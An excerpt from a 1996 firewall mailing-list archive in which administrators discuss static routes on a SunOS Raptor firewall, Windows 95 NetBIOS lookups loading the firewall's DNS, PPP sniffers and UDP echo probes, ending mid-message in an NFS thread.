OAA10492; Sat, 3 Feb 1996 14:26:43 -0600 (CST) From: Alan Hannan Message-Id: <199602032026.OAA10492@westie.gi.net> Subject: Re: Help with Sun-OS/Raptor Firewall To: jtriana@adp-es.com (Jorge Triana) Date: Sat, 3 Feb 1996 14:26:42 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: <1126f930@adp-es.com> from "Jorge Triana" at Feb 2, 96 02:58:05 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Jorge Triana is rumored to have said: ] I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0 ] running SunOS 4.1.4, (SOLARIS VERSION COMING SOON). ] The machine has two token ring cards, one for each of the net sides, ] unprotected and protected). Hmm. I wonder why you purchased a Raptor firewall? ] On the protected internal network side, I have a cisco router that is ] my gateway to the rest of the internal network. I am running IGRP in ] the internal network and also RIP on that router so that all my ] routing tables are redistributed into the ring where the Sun is ] connected to. Are you expecting your raptor firewall to route? I don't think a self respecting firewall will route packets, though all must route the packets wrt the kernel origin, hopefully they won't listen to routing protocols. Ask Marcus why, he'll tell us a nice story, methinks. ] On the unprotected side going to the internet, I have another cisco ] router running rip and going out to the rest of the world. Rip? IGRP? Would you really trust your firewall to a silly routing protocol? ] From the SUN workstation, I can ping to the outside world, internet ] and such with out a problem. I have routes to the rest of the world. Yah, that's your default. ] I can't however, ping anything beyond my directly connected devices ] that are on the protected ring. That is, any other subnet that is not ] directly connected to the subnet where the sun is, is not accessible. Right. What you need to do is manually add the routes. Throw them into /etc/netstart, and off you go. Like so, I think: in file /etc/netstart, put the following type lines after: route -n flush route -n add default 266.1.1.1 # <- assuming this is the external unprotected router route -n add 10.0.0.0 277.1.1.1 # <- assuming your internal network is 10/8 and sent to the router 277.1.1.1 Now, your firewall knows how to get there (after rebooting, of course, else you can add the routes manually, no problem). I really hope you're not running routed on your app-gw firewall, though, but what do I know? -alan 'firewall lackey' From firewalls-owner Sat Feb 3 14:59:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA10177 for firewalls-outgoing; Sat, 3 Feb 1996 14:50:27 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA10172 for ; Sat, 3 Feb 1996 14:50:23 -0800 (PST) Message-Id: <199602032250.OAA10172@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA050587825; Sun, 4 Feb 1996 09:50:25 +1100 From: Darren Reed Subject: Re: Help with Sun-OS/Raptor Firewall To: alan@gi.net (Alan Hannan) Date: Sun, 4 Feb 1996 09:50:24 +1100 (EDT) Cc: jtriana@adp-es.com, firewalls@GreatCircle.COM In-Reply-To: <199602032026.OAA10492@westie.gi.net> from "Alan Hannan" at Feb 3, 96 02:26:42 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Alan Hannan, sie said: [...] > Right. What you need to do is manually add the routes. Throw > them into /etc/netstart, and off you go. /etc/rc.local for SunOS4.1.x (/etc/netstart is new to 4.4BSD). > Like so, I think: > > in file /etc/netstart, put the following type lines after: > > route -n flush > route -n add default 266.1.1.1 # <- assuming this is the > external unprotected > router > route -n add 10.0.0.0 277.1.1.1 # <- assuming your internal > network is 10/8 and sent > to the router 277.1.1.1 darren From firewalls-owner Sat Feb 3 18:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA14568 for firewalls-outgoing; Sat, 3 Feb 1996 18:34:23 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA14558 for ; Sat, 3 Feb 1996 18:34:20 -0800 (PST) Date: Sat, 3 Feb 1996 21:33:25 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960203213325.202138aa@hobbes.orl.mmc.com> Subject: H-H-H-H-He's backkkkk Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subj: CNN on Mitnick >For what its worth, CNN had a 5 minute segment on two books which are >in print about Tsutomu Shimomura and Kevin Mitnick. Somehow this whole situation reminds me of the old saw "anyone who wants to be a politician, shouldn't." Howscome the people who get the "rich and famous" contracts are those who create an "attractive nuisance", those who are attracted to them, and those who have access to national tabloids disguising themselves as newspapers ? In the meantime, for those who do their job properly, nothing happens and employers wonder why they are paying them. Sometimes it seems that in order to be a "designated hero", you need a disaster which teaches that it is self-defeating to prevent the disaster in the first place. After all, where would David Sarnoff have been without the Titanic ? (Of course, it helps if you can write the history books too). Warmly, Padgett ps the real import of the MasterCard/Visa/Microsoft/Netscape accord is in the XIII (b) exclusions from ITAR. Take a look. From firewalls-owner Sun Feb 4 06:23:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA27965 for firewalls-outgoing; Sun, 4 Feb 1996 06:16:53 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA27960 for ; Sun, 4 Feb 1996 06:16:47 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQablx25418; Sun, 4 Feb 1996 09:15:54 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA24695; Sun, 4 Feb 96 09:05:22 EST Date: Sun, 4 Feb 1996 09:05:21 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Negative impact of Windows 95 on firewall performance Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact on many firewalls running DNS. This understanding is based in large part on the responses to my previous posting. Now that the problem has been identified, I would like to hear as many known solutions to the problem as possible. Windows 95 machines and some Windows NT machines are connecting to the DNS system on many company firewalls in an attempt to resolve NetBios names. The DNS lookup always fails, because DNS does not work with NetBios names and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes longer to establish connections that involve a DNS lookup. The IP stack in Windows 95 allows a machine to use DNS as a last resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which allowed the user to disable this feature; it was enabled by default. On the present Win95 stack an entire subsection of the IP set up relating to low-level NetBIOS/IP has been completely eliminated so there is no longer a tick box. The subsection that was eliminated also contained the "Enable WINS Proxy" flag. Every DNS query from a Windows 95 machine fails on the firewall DNS which currently will NOT cache a negative answer, so all such requests will be passed all the way up the DNS tree. During peak periods of Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS requests per second may be made to the firewall. What are the possible solutions to this problem? Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow Experimental Cyrogenics From firewalls-owner Sun Feb 4 08:53:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00761 for firewalls-outgoing; Sun, 4 Feb 1996 08:39:50 -0800 (PST) Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00756 for ; Sun, 4 Feb 1996 08:39:46 -0800 (PST) Received: from mculver by ncelec.com (5.4R3.10/200.2.1.5) id AA10461; Sun, 4 Feb 1996 08:34:26 -0800 Message-Id: <2.2.32.19960204163906.00698424@ncelec.com> X-Sender: mculver@ncelec.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 08:39:06 -0800 To: Sick Puppy From: Mike Culver Subject: Re: Negative impact of Windows 95 on firewall performance Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:05 AM 2/4/96 -0500, you wrote: > Every DNS query from a Windows 95 machine fails on the firewall DNS > which currently will NOT cache a negative answer, so all such requests > will be passed all the way up the DNS tree. During peak periods of > Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS > requests per second may be made to the firewall. I'm not so certain about above statement -- if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works. So perhaps the solution is to run an INTERNAL DNS server, that passes DNS down from the firewall, but never hands internal host names back up. (And, of course) lists all the WIN95 computer names with their addresses. From firewalls-owner Sun Feb 4 09:14:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00684 for firewalls-outgoing; Sun, 4 Feb 1996 08:38:05 -0800 (PST) Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00679 for ; Sun, 4 Feb 1996 08:37:52 -0800 (PST) Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAF2F5.E5AFC140@big486.ed-com.com>; Sun, 4 Feb 1996 11:42:44 -0500 Message-ID: From: Ed Woodrick To: "firewalls@GreatCircle.com" Subject: RE: Negative impact of Windows 95 on firewall performance Date: Sun, 4 Feb 1996 11:42:42 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAF2F5.E5BBF640" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BAF2F5.E5BBF640 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I would suggest that you first get the Win95 and WINNT resource kits. = They go into detail as to what is going on and what should be done in = certain situations.=20 The easiest solution is to enable a DHCP/WINS server set and set = broadcasts to P-Node (I believe) so that the resolution goes to the WINS = server and then to broadcast. And not to use WINS for Netbios = resolution. This will substantially reduce network broadcasts.=20 You are complaining about your DNS server getting I believe 10-15,000 = hits per day. This, I don't believe is a large number, but if you = believe that you are getting firewall performance problems, then just = add another DNS server onto the network. Of course, for anyone who = designs a network correctly, they will already have to DNS servers, and = what you should do is to point the workstations to the non-firewall DNS. As to the whole reason why NBT (Netbios over TCP/IP) is trying to = resolve names, I am assuming that you don't have Netbios installed, or = don't have it selected as the default protocol and you have the TCP/IP = stack installed. What you are seeing is the NBT trying to resolve names. = In Netbios, all that it needed to do was broadcast, but NBT can't trust = broadcast, the routers won't let it through, NBT has to go a little = further. This is where WINS come in. NBT can be setup to ask WINS (the = Netbios equivalent of DNS, but dynamic instead of static) where other = stations are. And DHCP can be used to configure the workstations to use = the correct WINS server and the correct name resolution type. Me personally, I am ever so thankful that Microsoft made NBT so flexible = and reliable. If I don't think about what I am doing, NBT will find some = way to resolve the names. If I want to reduce network traffic, then I = can make some changes, add a WINS and drastically reduce the broadcast = traffic, WINS also supports dynamic allocation and doesn't require, like = DNS, manual entry of all workstations. BTW, if you look at the DNS requests, you'll see that you could probably = decrease the traffic by actually putting in the queries that are being = asked for. One prime query is for the Domain and the Domain Servers on a = NT network. Or in a non-NT network, the addresses of the servers. Of = course if you were looking at a UNIX network, you would have to put = these addresses in, so Microsoft is making your job easier by giving you = the option. Ed Woodrick ---------- From: Sick Puppy[SMTP:sikpuppy@maestro.com] Sent: Sunday, February 04, 1996 9:05 AM To: firewalls@GreatCircle.com Subject: Negative impact of Windows 95 on firewall performance Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact = on many firewalls running DNS. This understanding is based in large = part on the responses to my previous posting. Now that the problem has been identified, I would like to hear as = many known solutions to the problem as possible. Windows 95 machines and some Windows NT machines are connecting to = the DNS system on many company firewalls in an attempt to resolve = NetBios names. The DNS lookup always fails, because DNS does not work with NetBios names and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes = longer to establish connections that involve a DNS lookup. The IP stack in Windows 95 allows a machine to use DNS as a last = resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which = allowed the user to disable this feature; it was enabled by default. On the present Win95 stack an entire subsection of the IP set up relating = to low-level NetBIOS/IP has been completely eliminated so there is no longer a tick box. The subsection that was eliminated also = contained the "Enable WINS Proxy" flag. Every DNS query from a Windows 95 machine fails on the firewall DNS which currently will NOT cache a negative answer, so all such = requests will be passed all the way up the DNS tree. During peak periods of Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS requests per second may be made to the firewall. What are the possible solutions to this problem? Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow Experimental Cyrogenics ------ =_NextPart_000_01BAF2F5.E5BBF640-- From firewalls-owner Sun Feb 4 09:38:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA01241 for firewalls-outgoing; Sun, 4 Feb 1996 09:29:32 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA01236 for ; Sun, 4 Feb 1996 09:29:26 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA208; Sun, 4 Feb 1996 12:28:28 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca>; Sun, 4 Feb 1996 12:27:11 -0500 Message-ID: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca> From: "Russ.Cooper@RC.Toronto.on.ca" To: "'Sick Puppy'" Cc: "'Firewalls'" Subject: RE: Negative impact of Windows 95 on firewall performance Date: Sun, 4 Feb 1996 12:27:10 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The solution is to put in an NT WINS server and have all your Win95 machines configured to use that WINS server. This will prevent the machines from using DNS to resolve Netbios names. As I suggested this before, I assume you want to know what to do if you do not have an NT WINS Server, is this correct? The simple answer, if the above assumption is correct, is to unbind the Client for Microsoft Networks from the TCP/IP protocol, and use NetBeui or IPX/SPX as the only protocol for Client for Microsoft Networks. NetBios will not be carried over TCP/IP in that case, and DNS resolution will never come into play. Cheers, Russ Cooper, Senior Consultant - Internet SHL/Computer Innovations - Consulting Services Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com "Do you have the vision to see my future as I have projected it?" From firewalls-owner Sun Feb 4 11:54:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA04922 for firewalls-outgoing; Sun, 4 Feb 1996 11:43:15 -0800 (PST) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA04917 for ; Sun, 4 Feb 1996 11:43:11 -0800 (PST) Received: from maestro.Maestro.COM by relay1.UU.NET with SMTP id QQabms24985; Sun, 4 Feb 1996 14:40:42 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28023; Sun, 4 Feb 96 13:30:42 EST Date: Sun, 4 Feb 1996 13:30:41 -0500 (EST) From: Sick Puppy To: "Russ.Cooper@RC.Toronto.on.ca" Cc: "'Firewalls'" Subject: RE: Negative impact of Windows 95 on firewall performance In-Reply-To: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As I suggested this before, I assume you want to know what to do if you do > not have an NT WINS Server, is this correct? Enlightenment slowly cleared the confused mind of the stupid dawg. Well, yes. I sincerely appreciate your advice. So will the other dawgs I was talking to, on account of we was all confused together. Sick Puppy cDm From firewalls-owner Sun Feb 4 12:08:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA05067 for firewalls-outgoing; Sun, 4 Feb 1996 11:52:56 -0800 (PST) Received: from belize.ucs.indiana.edu (belize.ucs.indiana.edu [129.79.10.64]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA05053 for ; Sun, 4 Feb 1996 11:52:51 -0800 (PST) Received: from othello.ucs.indiana.edu (root@othello.ucs.indiana.edu [129.79.10.45]) by belize.ucs.indiana.edu (8.7.3/8.7.3/1.10IUPO) with ESMTP id OAA02737 for ; Sun, 4 Feb 1996 14:50:02 -0500 (EST) Received: from defiant.ucs.indiana.edu (xyplex3-3-14.ucs.indiana.edu [129.79.18.194]) by othello.ucs.indiana.edu (8.7/8.7/regexp($Revision: 1.3 $) with SMTP id OAA10950 for ; Sun, 4 Feb 1996 14:51:56 -0500 (EST) Message-Id: <1.5.4b11.32.19960204205328.00680500@192.168.2.100> X-Sender: jlundin@192.168.2.100 X-Mailer: Windows Eudora Light Version 1.5.4b11 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 14:53:28 -0600 To: firewalls@GreatCircle.com From: Wally the Craw Wurm Subject: CERN httpd man page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there a man page for the cern httpd? All my searches for it come up with nothing but binaries. Thanks Jeremy Lundin ------------------------------------------------------------------------------ You have been touched by the wisdom of Wally the Craw Wurm. Be proud. Jer Lundin Email: jlundin@indiana.edu 300 East Matlock, Apt. #26 WWW: Coming Soon! Bloomington, IN 47408 Voice: (812)336-5444 ------------------------------------------------------------------------------ From firewalls-owner Sun Feb 4 13:38:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA07729 for firewalls-outgoing; Sun, 4 Feb 1996 13:31:24 -0800 (PST) Received: from eagle1.raptor.com (raptor.com [204.7.243.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA07724 for ; Sun, 4 Feb 1996 13:30:57 -0800 (PST) Received: from raptor1.raptor.com ([204.7.242.10]) by eagle1.raptor.com via smtpd (for miles.greatcircle.com [198.102.244.34]) with SMTP; 4 Feb 1996 21:28:14 UT Received: from eagle1a.raptor.com (eagle1a.raptor.com [204.7.242.1]) by raptor1.raptor.com (8.7.1/8.7.1) with SMTP id QAA11458 for ; Sun, 4 Feb 1996 16:20:02 -0500 (EST) Date: Sun, 4 Feb 1996 16:20:02 -0500 (EST) Message-Id: <199602042120.QAA11458@raptor1.raptor.com> From: Tony Ferro To: firewalls@GreatCircle.COM Received: from tferro.vip.best.com ([204.156.134.157]) by eagle1a.raptor.com via smtpd (for raptor1.raptor.com [204.7.242.10]) with SMTP; 4 Feb 1996 21:26:12 UT Subject: Re: PC based sniffer X-Mailer: ProntoIP [version 2.0] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Folks, I've seen responses for ethernet sniffers, is there any software available for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer and its trace features are pretty limited - can count IP pkts, but can't see inside them. TIA, Tony From firewalls-owner Sun Feb 4 14:26:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08813 for firewalls-outgoing; Sun, 4 Feb 1996 14:11:40 -0800 (PST) Received: from ilinx.ilinx.com (ilinx.bctel.net [204.174.66.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08795 for ; Sun, 4 Feb 1996 14:11:25 -0800 (PST) Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Sun, 4 Feb 96 14:10 PST Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) Date: Sun, 4 Feb 1996 14:10:10 -0800 (PST) To: firewalls@GreatCircle.COM Reply-To: brian@ilinx.bctel.net, brian_murrell@bctel.net Subject: anybody know of any vulnerabilities with "echo" X-Mailer: Ishmail 1.2-960125-386 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Folks, At a particular Internet firewall I administer, I've noticed a rash of "echo" (udp port 7) service attempts. These came on pretty suddenly (as if a whole shwack of people found something out) and are pretty constant now. I'm wondering if a new vulnerablity with the (a particular implementation maybe) echo server has been found. Anybody else notice this trend?? b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Sun Feb 4 14:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08854 for firewalls-outgoing; Sun, 4 Feb 1996 14:14:32 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08847 for ; Sun, 4 Feb 1996 14:14:28 -0800 (PST) Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id OAA04169; Sun, 4 Feb 1996 14:11:03 -0800 Message-Id: <199602042211.OAA04169@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 17:11:41 -0500 To: Tony Ferro From: Paul Ferguson Subject: Re: PC based sniffer Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Tony. How's it going at Raptor? - paul At 04:20 PM 2/4/96 -0500, Tony Ferro wrote: >Hi Folks, > >I've seen responses for ethernet sniffers, is there any software available >for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer >and its trace features are pretty limited - can count IP pkts, but can't >see inside them. > >TIA, >Tony > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sun Feb 4 15:23:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10424 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:30 -0800 (PST) Received: from netlink.co.nz (NLserver1.netlink.co.nz [202.20.93.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10412 for ; Sun, 4 Feb 1996 15:09:25 -0800 (PST) Received: from manukau.govt.nz (kotuku.manukau.govt.nz [202.14.82.1]) by netlink.co.nz (8.6.12/8.6.6) with SMTP id MAA11751 for ; Mon, 5 Feb 1996 12:08:26 +1300 Received: from MAIN-Message_Server by manukau.govt.nz with Novell_GroupWise; Mon, 05 Feb 1996 12:11:28 +1200 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 05 Feb 1996 10:46:08 +1200 From: Matthew Thompson To: firewalls@greatcircle.com Subject: FW: Windows 95 clobbering firewall? -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Imagine that, A system told to use DNS for netbios name resolution actually tries to use DNS for netbios name resolution :-) 'Course you could enter these PC's into the DNS and watch the problem evaporate... Or configure DHCP+WINS. See Win NT resource kit 3.5, NT networking guide chapter 12 pg 201 for a discussion of Wins, Broadcast and DNS name resolution for Win NT IP clients. From firewalls-owner Sun Feb 4 15:53:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10602 for firewalls-outgoing; Sun, 4 Feb 1996 15:16:23 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10572 for ; Sun, 4 Feb 1996 15:16:17 -0800 (PST) Message-Id: <199602042316.PAA10572@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA238755723; Mon, 5 Feb 1996 10:15:23 +1100 From: Darren Reed Subject: Re: anybody know of any vulnerabilities with "echo" To: brian@ilinx.bctel.net, brian_murrell@bctel.net Date: Mon, 5 Feb 1996 10:15:23 +1100 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Brian J. Murrell" at Feb 4, 96 02:10:10 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Brian J. Murrell, sie said: > > Hi Folks, > > At a particular Internet firewall I administer, I've noticed a rash of > "echo" (udp port 7) service attempts. These came on pretty suddenly (as if > a whole shwack of people found something out) and are pretty constant now. If you disallow ICMP ECHO/ECHOREPLY (ie ping doesn't work), then using udp/7 is the next best thing to try to estimate RTT. Satan and other similar tools can make use of it. darren From firewalls-owner Sun Feb 4 15:59:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10480 for firewalls-outgoing; Sun, 4 Feb 1996 15:11:35 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10475 for ; Sun, 4 Feb 1996 15:11:27 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA95; Sun, 4 Feb 1996 18:10:22 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca>; Sun, 4 Feb 1996 18:09:04 -0500 Message-ID: <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca> From: Russ To: "firewalls@GreatCircle.COM" Cc: "'Sick Puppy'" Subject: RE: Negative impact of Windows 95 on firewall performance Date: Sun, 4 Feb 1996 18:08:57 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sick Puppy said... > The IP stack in Windows 95 allows a machine to use DNS as a last resort > in resolving NetBIOS names. On early versions there was an advanced > setup screen which had a tick box "Use DNS for NetBIOS" which allowed > the user to disable this feature; it was enabled by default. On the > present Win95 stack an entire subsection of the IP set up relating to > low-level NetBIOS/IP has been completely eliminated so there is no > longer a tick box. The subsection that was eliminated also contained > the "Enable WINS Proxy" flag. While its true that you can't disable DNS lookups for NetBios names through the GUI anymore, you can still disable it through the registry. However, the method to do this looks like it will disable all DNS functionality. Key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP Entry: EnableDNS Value: 1 (default = yes) Change the value to 0 = no, and no more NetBios lookups to your DNS, but other DNS lookups will still be executed. I should also point out that LMHOSTS NetBios to IP entries will not be used when DNS is enabled unless they are prefixed with the #PRE option to preload them. Sorry to have cluttered your mailboxes with all this Microsoft stuff, but I wanted to be able to go to sleep tonight knowing that your Firewall DNS will not come crashing down around your ears due to yet another Microsoft IP kerfuffle. ;-] Cheers, Russ Cooper, Senior Consultant - Internet SHL/Computer Innovations - Consulting Services Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com "Do you have the vision to see my future as I have projected it?" From firewalls-owner Sun Feb 4 16:08:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11884 for firewalls-outgoing; Sun, 4 Feb 1996 15:54:31 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11853 for ; Sun, 4 Feb 1996 15:54:22 -0800 (PST) Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id PAA13152 for ; Sun, 4 Feb 1996 15:52:48 -0800 Message-Id: <199602042352.PAA13152@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 18:53:27 -0500 To: firewalls@GreatCircle.COM From: Paul Ferguson Subject: Re: PC based sniffer Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Damn. I hate when that happens. Sorry for CC:'ing the list. Must be the weather. :-) - paul >X-Sender: pferguso@lint.cisco.com >Date: Sun, 04 Feb 1996 17:11:41 -0500 >To: Tony Ferro >From: Paul Ferguson >Subject: Re: PC based sniffer >Cc: firewalls@GreatCircle.COM >Sender: firewalls-owner@GreatCircle.COM > >Hi, Tony. > >How's it going at Raptor? > >- paul > From firewalls-owner Sun Feb 4 16:28:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10444 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:53 -0800 (PST) Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10430 for ; Sun, 4 Feb 1996 15:09:44 -0800 (PST) Message-Id: <199602042309.PAA10430@miles.greatcircle.com> Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Mon, 05 Feb 1996 10:08:44 +1100 Date: Mon, 05 Feb 1996 09:57:26 +1000 From: rex@staff.cs.su.oz.au (Rex di Bona) Subject: NFS services and firewalls To: firewalls@GreatCircle.COM Reply-To: rex@cs.su.oz.au Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > We have a requirement to provide a network mountable filesystem in a > shared developement environment between the firewalls of ours and > another company. > _________ > us -------|_ 